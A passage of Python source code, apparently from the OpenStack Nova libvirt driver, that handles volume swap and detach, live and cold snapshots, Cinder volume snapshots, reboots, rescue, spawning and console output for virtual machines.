domain.blockRebase(disk_path, new_path, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path,
libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT)
finally:
self._conn.defineXML(xml)
def swap_volume(self, old_connection_info,
new_connection_info, instance, mountpoint):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
conf = self.volume_driver_method('connect_volume',
new_connection_info,
disk_info)
if not conf.source_path:
self.volume_driver_method('disconnect_volume',
new_connection_info,
disk_dev)
raise NotImplementedError(_("Swap only supports host devices"))
self._swap_volume(virt_dom, disk_dev, conf.source_path)
self.volume_driver_method('disconnect_volume',
old_connection_info,
disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
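# Illustrative only: for device 'vdb' this helper returns the matching
# disk element serialized as XML, roughly like the abbreviated,
# hypothetical snippet below:
#
#     <disk type='block' device='disk'>
#       <source dev='/dev/disk/by-path/...-lun-1'/>
#       <target dev='vdb' bus='virtio'/>
#       <serial>VOLUME-UUID</serial>
#     </disk>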
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("During detach_volume, instance disappeared."))
else:
raise
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
def attach_interface(self, instance, image_meta, vif):
virt_dom = self._lookup_by_name(instance['name'])
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
self.vif_driver.plug(instance, vif)
self.firewall_driver.setup_basic_filtering(instance, [vif])
cfg = self.vif_driver.get_config(instance, vif, image_meta,
inst_type)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, vif)
raise exception.InterfaceAttachFailed(instance)
def detach_interface(self, instance, vif):
virt_dom = self._lookup_by_name(instance['name'])
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
cfg = self.vif_driver.get_config(instance, vif, None, inst_type)
try:
self.vif_driver.unplug(instance, vif)
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(instance)
def _create_snapshot_metadata(self, base, instance, img_fmt, snp_name):
metadata = {'is_public': False,
'status': 'active',
'name': snp_name,
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if instance['os_type']:
metadata['properties']['os_type'] = instance['os_type']
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = img_fmt
metadata['container_format'] = base.get('container_format', 'bare')
return metadata
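# Illustrative only: for a qcow2 snapshot of an image-backed instance,
# the metadata built above would look roughly like the hypothetical
# dict below (identifiers invented):
#
#     {'is_public': False, 'status': 'active', 'name': 'my-snap',
#      'disk_format': 'qcow2', 'container_format': 'bare',
#      'properties': {'kernel_id': '...', 'ramdisk_id': '...',
#                     'image_location': 'snapshot',
#                     'image_state': 'available',
#                     'owner_id': '<project-id>', 'os_type': 'linux'}}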
def snapshot(self, context, instance, image_href, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
base = compute_utils.get_image_metadata(
context, image_service, image_id, instance)
_image_service = glance.get_remote_image_service(context, image_href)
snapshot_image_service, snapshot_image_id = _image_service
snapshot = snapshot_image_service.show(context, snapshot_image_id)
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm and rbd as raw
if image_format == 'lvm' or image_format == 'rbd':
image_format = 'raw'
metadata = self._create_snapshot_metadata(base,
instance,
image_format,
snapshot['name'])
snapshot_name = uuid.uuid4().hex
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if (self.has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT)
and source_format not in ('lvm', 'rbd')):
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
# confirms the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
self._detach_pci_devices(virt_dom,
pci_manager.get_instance_pci_devs(instance))
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
snapshot_name,
image_type=source_format)
if live_snapshot:
LOG.info(_("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_("Beginning cold snapshot process"),
instance=instance)
snapshot_backend.snapshot_create()
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt_snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE (rmk): libvirt needs to be able to write to the
# temp directory, which is owned by nova.
utils.execute('chmod', '777', tmpdir, run_as_root=True)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
if not live_snapshot:
snapshot_backend.snapshot_delete()
new_dom = None
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
new_dom = self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
new_dom = self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
if new_dom is not None:
self._attach_pci_devices(new_dom,
pci_manager.get_instance_pci_devs(instance))
LOG.info(_("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
image_service.update(context,
image_href,
metadata,
image_file)
LOG.info(_("Snapshot image upload complete"),
instance=instance)
@staticmethod
def _wait_for_block_job(domain, disk_path, abort_on_error=False):
status = domain.blockJobInfo(disk_path, 0)
if status == -1 and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if cur == end and cur != 0 and end != 0:
return False
else:
return True
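# Illustrative only: while a block job is in flight, blockJobInfo()
# returns a progress dict roughly like
#
#     {'type': 2, 'bandwidth': 0, 'cur': 524288, 'end': 1073741824}
#
# (values invented); once no job is active it returns an empty result,
# so the helper above keeps returning True until 'cur' reaches 'end'.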
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
# NOTE (rmk): We are using shallow rebases as a workaround for a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2', None,
out_path, image_format)
def _volume_snapshot_update_status(self, context, snapshot_id, status):
"""Send a snapshot status update to Cinder.
This method captures and logs exceptions that occur, since
callers cannot do anything useful with these exceptions.
Operations on the Cinder side waiting for this will time out if
a failure occurs sending the update.
:param context: security context
:param snapshot_id: id of snapshot being updated
:param status: new status value
"""
try:
self._volume_api.update_snapshot_status(context,
snapshot_id,
status)
except Exception:
msg = _('Failed to send updated snapshot status '
'to volume service.')
LOG.exception(msg)
def _volume_snapshot_create(self, context, instance, domain,
volume_id, snapshot_id, new_file):
"""Perform volume snapshot.
:param domain: VM that volume is attached to
:param volume_id: volume UUID to snapshot
:param snapshot_id: UUID of snapshot being created
:param new_file: relative path to new qcow2 file present on share
"""
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
disks_to_snap = [] # to be snapshotted by libvirt
disks_to_skip = [] # local disks not snapshotted
for disk in device_info.devices:
if (disk.root_name != 'disk'):
continue
if (disk.target_dev is None):
continue
if (disk.serial is None or disk.serial != volume_id):
disks_to_skip.append(disk.source_path)
continue
# disk is a Cinder volume with the correct volume_id
disk_info = {
'dev': disk.target_dev,
'serial': disk.serial,
'current_file': disk.source_path
}
# Determine path for new_file based on current path
current_file = disk_info['current_file']
new_file_path = os.path.join(os.path.dirname(current_file),
new_file)
disks_to_snap.append((current_file, new_file_path))
if not disks_to_snap:
msg = _('Found no disk to snapshot.')
raise exception.NovaException(msg)
snapshot = vconfig.LibvirtConfigGuestSnapshot()
for current_name, new_filename in disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = current_name
snap_disk.source_path = new_filename
snap_disk.source_type = 'file'
snap_disk.snapshot = 'external'
snap_disk.driver_name = 'qcow2'
snapshot.add_disk(snap_disk)
for dev in disks_to_skip:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = dev
snap_disk.snapshot = 'no'
snapshot.add_disk(snap_disk)
snapshot_xml = snapshot.to_xml()
LOG.debug(_("snap xml: %s") % snapshot_xml)
snap_flags = (libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT)
QUIESCE = libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE
try:
domain.snapshotCreateXML(snapshot_xml,
snap_flags | QUIESCE)
return
except libvirt.libvirtError:
msg = _('Unable to create quiesced VM snapshot, '
'attempting again with quiescing disabled.')
LOG.exception(msg)
try:
domain.snapshotCreateXML(snapshot_xml, snap_flags)
except libvirt.libvirtError:
msg = _('Unable to create VM snapshot, '
'failing volume_snapshot operation.')
LOG.exception(msg)
raise
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
"""Create snapshots of a Cinder volume via libvirt.
:param instance: VM instance reference
:param volume_id: id of volume being snapshotted
:param create_info: dict of information used to create snapshots
- snapshot_id : ID of snapshot
- type : qcow2 / <other>
- new_file : qcow2 file created by Cinder which
becomes the VM's active image after
the snapshot is complete
"""
LOG.debug(_("volume_snapshot_create: instance: %(instance)s "
"create_info: %(c_info)s") % {'instance': instance['uuid'],
'c_info': create_info})
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
if create_info['type'] != 'qcow2':
raise exception.NovaException(_('Unknown type: %s') %
create_info['type'])
snapshot_id = create_info.get('snapshot_id', None)
if snapshot_id is None:
raise exception.NovaException(_('snapshot_id required '
'in create_info'))
try:
self._volume_snapshot_create(context, instance, virt_dom,
volume_id, snapshot_id,
create_info['new_file'])
except Exception:
with excutils.save_and_reraise_exception():
msg = _('Error occurred during volume_snapshot_create, '
'sending error status to Cinder.')
LOG.exception(msg)
self._volume_snapshot_update_status(
context, snapshot_id, 'error')
self._volume_snapshot_update_status(
context, snapshot_id, 'creating')
def _volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info=None):
"""
Note:
if file being merged into == active image:
do a blockRebase (pull) operation
else:
do a blockCommit operation
Files must be adjacent in snap chain.
:param instance: instance reference
:param volume_id: volume UUID
:param snapshot_id: snapshot UUID (unused currently)
:param delete_info: {
'type': 'qcow2',
'file_to_merge': 'a.img',
'merge_target_file': 'b.img' or None (if merging file_to_merge into
active image)
}
Libvirt blockjob handling required for this method is broken
in versions of libvirt that do not contain:
http://libvirt.org/git/?p=libvirt.git;h=0f9e67bfad (1.1.1)
(Patch is pending in 1.0.5-maint branch as well, but we cannot detect
libvirt 1.0.5.5 vs. 1.0.5.6 here.)
"""
if not self.has_min_version(MIN_LIBVIRT_BLOCKJOBINFO_VERSION):
ver = '.'.join([str(x) for x in MIN_LIBVIRT_BLOCKJOBINFO_VERSION])
msg = _("Libvirt '%s' or later is required for online deletion "
"of volume snapshots.") % ver
raise exception.Invalid(msg)
LOG.debug(_('volume_snapshot_delete: delete_info: %s') % delete_info)
if delete_info['type'] != 'qcow2':
msg = _('Unknown delete_info type %s') % delete_info['type']
raise exception.NovaException(msg)
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
# Find dev name
my_dev = None
active_disk = None
xml = virt_dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
for disk in device_info.devices:
if (disk.root_name != 'disk'):
continue
if (disk.target_dev is None or disk.serial is None):
continue
if disk.serial == volume_id:
my_dev = disk.target_dev
active_disk = disk.source_path
if my_dev is None or active_disk is None:
msg = _('Unable to locate disk matching id: %s') % volume_id
raise exception.NovaException(msg)
LOG.debug(_("found dev, it's %(dev)s, with active disk: %(disk)s"),
{'dev': my_dev, 'disk': active_disk})
if delete_info['merge_target_file'] is None:
# pull via blockRebase()
# Merge the most recent snapshot into the active image
rebase_disk = my_dev
rebase_base = delete_info['file_to_merge']
rebase_bw = 0
rebase_flags = 0
LOG.debug(_('disk: %(disk)s, base: %(base)s, '
'bw: %(bw)s, flags: %(flags)s') %
{'disk': rebase_disk,
'base': rebase_base,
'bw': rebase_bw,
'flags': rebase_flags})
result = virt_dom.blockRebase(rebase_disk, rebase_base,
rebase_bw, rebase_flags)
if result == 0:
LOG.debug(_('blockRebase started successfully'))
while self._wait_for_block_job(virt_dom, rebase_disk,
abort_on_error=True):
LOG.debug(_('waiting for blockRebase job completion'))
time.sleep(0.5)
else:
# commit with blockCommit()
commit_disk = my_dev
commit_base = delete_info['merge_target_file']
commit_top = delete_info['file_to_merge']
bandwidth = 0
flags = 0
result = virt_dom.blockCommit(commit_disk, commit_base, commit_top,
bandwidth, flags)
if result == 0:
LOG.debug(_('blockCommit started successfully'))
while self._wait_for_block_job(virt_dom, commit_disk,
abort_on_error=True):
LOG.debug(_('waiting for blockCommit job completion'))
time.sleep(0.5)
def volume_snapshot_delete(self, context, instance, volume_id, snapshot_id,
delete_info=None):
try:
self._volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info=delete_info)
except Exception:
with excutils.save_and_reraise_exception():
msg = _('Error occurred during volume_snapshot_delete, '
'sending error status to Cinder.')
LOG.exception(msg)
self._volume_snapshot_update_status(
context, snapshot_id, 'error_deleting')
self._volume_snapshot_update_status(context, snapshot_id, 'deleting')
def reboot(self, context, instance, network_info, reboot_type='SOFT',
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
try:
soft_reboot_success = self._soft_reboot(instance)
except libvirt.libvirtError as e:
LOG.debug(_("Instance soft reboot failed: %s"), e)
soft_reboot_success = False
if soft_reboot_success:
LOG.info(_("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_("Failed to soft reboot instance. "
"Trying hard reboot."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
for x in xrange(CONF.libvirt_wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
new_domid = dom.ID()
# NOTE(ivoks): By checking domain IDs, we make sure we are
# not recreating domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
The domain XML is regenerated from the current instance and block
device information rather than being reused from the existing domain.
"""
self._destroy(instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self.to_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self.get_instance_disk_info(instance['name'], xml,
block_device_info)
instance_dir = libvirt_utils.get_instance_path(instance)
self._create_images_and_backing(context, instance, instance_dir,
disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(xml, instance, network_info,
block_device_info, context=context,
reboot=True)
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._detach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
dom.managedSave(0)
def resume(self, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
dom = self._create_domain_and_network(xml, instance, network_info,
block_device_info)
self._attach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
if self.instance_exists(instance['name']):
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
power_state.PAUSED)
if state in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
should not edit or override the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
rescue_images = {
'image_id': CONF.rescue_image_id or instance['image_ref'],
'kernel_id': CONF.rescue_kernel_id or instance['kernel_id'],
'ramdisk_id': CONF.rescue_ramdisk_id or instance['ramdisk_id'],
}
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
None,
image_meta,
rescue=True)
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self.to_xml(context, instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance['name'])
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self.get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
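# Illustrative only: for each interface the call above is roughly
# equivalent to running (interface name invented):
#
#     echo 1 | sudo tee /sys/class/net/vnet0/brport/hairpin_mode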
# NOTE(ilyaalekseyev): Implementation similar to the multinic
# support in the xenapi driver (tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self.to_xml(context, instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, context=context)
LOG.debug(_("Instance is running"), instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
fp = open(fpath, 'a+')
fp.write(data)
return fpath
def get_console_output(self, instance):
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file, prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes '
'ignored'), remaining, instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
# NOTE(rmk): We had VNC consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='vnc')
port = get_vnc_port_for_instance(instance['name'])
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
def get_spice_console(self, instance):
